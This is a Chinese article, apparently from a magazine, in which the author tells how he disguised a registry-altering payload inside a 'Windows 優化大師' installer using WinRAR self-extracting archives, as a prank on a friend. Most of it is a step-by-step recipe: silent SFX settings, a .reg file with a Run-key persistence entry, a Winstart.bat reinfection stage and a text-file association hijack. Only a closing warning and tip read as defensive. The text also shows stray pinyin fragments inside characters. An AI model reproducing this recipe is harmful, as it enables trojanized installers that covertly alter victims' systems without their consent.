與Winzip相比,Winrar3.0的自解壓程序要多出功能。其中一項(xiàng)最為突出的功能,也是潛在著最大危險(xiǎn)的是:它可以在解壓前或解壓后,無聲無息地自動(dòng)運(yùn)行程序。
如果你不以為然,先看完以下事例:
幾天前,一位朋友要我copy一份我從網(wǎng)上下載的‘Windows 優(yōu)化大師’給他,我靈機(jī)一動(dòng),想起這幾天研究Winrar3.0的心得,便滿口答應(yīng)。到了晚上,我花了幾小時(shí)的時(shí)間為他特制了一份‘Windows 優(yōu)化大師’,制作流程如下:建立一個(gè)注冊(cè)表角本文件,我取的文件名為regeditt.reg在里面寫入:REGEDIT4[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion]"RegisteredOwner"="××"[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}]@="××""InfoTip"="包含可以恢復(fù)或永久刪除的已刪除項(xiàng)目。"[HKEY_USERS\.DEFAULT\Software\Classes\CLSID\{20D04FE0-
3AEA-1069-A2D8-08002B30309D}]@="××的電腦" [HKEY_CURRENT_USER
\Control Panel\International]"StimeFormat"="×× HH:mm"[HKEY_LOCAL_MACHINE\Software\
Microsoft\Windows\CurrentVersion\Run]"TaskMonitoy"="regedit /s c:\\Windows\\sysbckup
\\regeditt.reg"注:以上××均是不健康的調(diào)侃他人的詞匯,編輯對(duì)它們做了凈化。
上面第一項(xiàng)是更改計(jì)算機(jī)注冊(cè)名稱,第二項(xiàng)是更改‘回收站’名稱,第三項(xiàng)是更改‘我的電腦’名稱。第四項(xiàng)是在任務(wù)欄時(shí)間前加上文字,第五項(xiàng)是每次開機(jī)后自動(dòng)運(yùn)行c:\Windows\sysbckup\regeditt.reg。
建立完成后就是用Winrar打包了,選中regeditt.reg后擊右鍵,在菜單中選‘添加到檔案文件’,在彈出對(duì)話框中,把檔案名稱寫為a1.exe,在下面存檔選項(xiàng)中選中‘創(chuàng)建自釋放格式’。然后在高級(jí)-自釋放選項(xiàng)中寫入釋放路徑,我寫的是c:\Windows\Sysbckup,接下來就是在‘釋放后運(yùn)行’中寫入regeditt.reg,然后在模式中選中‘全部隱藏’和‘覆蓋所有文件’,完成這些后按確定,再選擇注釋我們會(huì)看到以下內(nèi)容:Path=c:\Windows\SysbckupSetup=regeditt.regSilent=1Overwrite=1我們發(fā)現(xiàn)釋放后運(yùn)行的格式是Setup=*.*,這里是=regeditt.reg,但這樣運(yùn)行后系統(tǒng)會(huì)提示你是否確認(rèn)導(dǎo)入注冊(cè)表,所以應(yīng)作如下修改:Path=c:\Windows\SysbckupSetup=regedit /s regeditt.regSilent=1Overwrite=1完成后按確定按扭,就會(huì)建立出一個(gè)名為a1.exe的Winrar自解壓程序,如果雙擊運(yùn)行它,屏幕上將沒有任何顯示,但它已無聲無息地把regeditt.reg拷貝到c:\Windows\Sysbckup,并把其中的內(nèi)容寫入到注冊(cè)表中了。
現(xiàn)在的問題是如何讓我的朋友運(yùn)行A1.exe呢?對(duì)了,用‘Windows 優(yōu)化大師’。把A1.exe與‘Windows 優(yōu)化大師’的安裝文件(解壓后的)放在一起打包,建立 Windows 優(yōu)化大師.exe,全選后擊右鍵,選‘添加到檔案文件’……操作大致同A1.exe。只不過名稱改為 Windows 優(yōu)化大師.exe,解壓路徑改成:c:\Windows\temp,而且解壓后要運(yùn)行A1.exe和setup.exe兩個(gè)文件,其注釋內(nèi)容應(yīng)為:Path=c:\Windows\tempSetup=a1.exeSetup=setup.exeSilent=1Overwrite=1按確認(rèn)后,我們已初步完成了一份特制的‘Windows 優(yōu)化大師’了,為什么說‘初步’完成呢?因?yàn)楝F(xiàn)在修改注冊(cè)表和啟動(dòng)項(xiàng)早已不是什么秘密了,所以A1.exe只不過是附料,還需要加入一味主料:A2.exe.把regeditt.reg更名另存為system.reg,去掉其中的[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]"TaskMonitoy"="regedit /s c:\\Windows\\sysbckup\\regeditt.reg"然后用計(jì)事本建立Winstart.bat,其中內(nèi)容要寫成:@echo off regedit c:\Windows\system.reg>nul這樣寫屏幕上將沒有顯示,完成后把這兩個(gè)文件用Winrar作成自解壓程序A2.exe,操作同A1.exe,但解壓路徑要改成 c:\WinDOWS,解壓后也不需運(yùn)行.其注釋內(nèi)容應(yīng)為:Path=c:\WindowsSilent=1Overwrite=1完成后把a(bǔ)2.exe加入做好的 Windows 優(yōu)化大師.exe,加入方法是:右擊 Windows 優(yōu)化大師.exe選擇‘用Winrar打開’,把a(bǔ)2.exe拖入,按確定,然后點(diǎn)擊工具欄中的注釋,修改其中內(nèi)容為:Path=c:\Windows\tempSetup=a1.exeSetup=a2.exeSetup=setup.exeSilent=1Overwrite=1然后確定-退出。到此為止,特制的‘Windows 優(yōu)化大師.exe’已全部完成。因?yàn)閃instart.bat是在進(jìn)入Windows圖形界面之前運(yùn)行的一個(gè)程序,所以加入A2.exe后,就算我的朋友能恢復(fù)注冊(cè)表,甚至刪除regeditt.reg,但只要c:\Windows下的system.reg和Winstart.bat不被發(fā)現(xiàn),重啟動(dòng)后他的電腦將‘××’依舊。
在Windows98中啟動(dòng)程序的方法很多,如通過AUTOEXEC.BAT、Winstart.bat、開始菜單中的啟動(dòng)、注冊(cè)表中的啟動(dòng)項(xiàng)、Win.ini、system.ini、Wininit.ini和修改文件關(guān)聯(lián)等都可達(dá)到啟動(dòng)程序的目的。如:用Winrar自解壓程序在注冊(cè)表中導(dǎo)入REGEDIT4[HKEY_CLASSES_ROOT\txtfile\shell\open\command]@="regedit /s c:\\Windows\\system.reg"那么在雙擊txt類型文件時(shí)將不會(huì)以計(jì)事本打開,而是沒有任何反應(yīng)。但c:\\Windows\\system.reg中的內(nèi)容也會(huì)悄無聲息的被導(dǎo)入注冊(cè)表。但我沒有這樣做,因?yàn)楝F(xiàn)在的這些已經(jīng)夠的的朋友折騰了。
第二天,我把這份‘精裝’的 Windows 優(yōu)化大師 交給了朋友,其后果可想而知。足足三天他在對(duì)著屏幕上的‘××’發(fā)愣。
以上的這些只是我用了Winrar強(qiáng)大的自解壓功能,和朋友開了一個(gè)小玩笑,但從上面事例不難看出,WinrarR的這些功能使不會(huì)編程的人也能制作出一些惡意的程序,如果有人給這些程序起上一些漂亮的名字(如Windows 優(yōu)化大師 2002 等)在網(wǎng)上發(fā)布,用它來format你的硬盤、deltree你的文件等等,也不是沒有可能的。最最可怕的是,如果運(yùn)行的是一個(gè)木馬程序的客戶端,那后果更加的不勘設(shè)想。
提示:不要直接運(yùn)行自解壓程序,而是選擇右鍵菜單中的“用Winrar打開”。
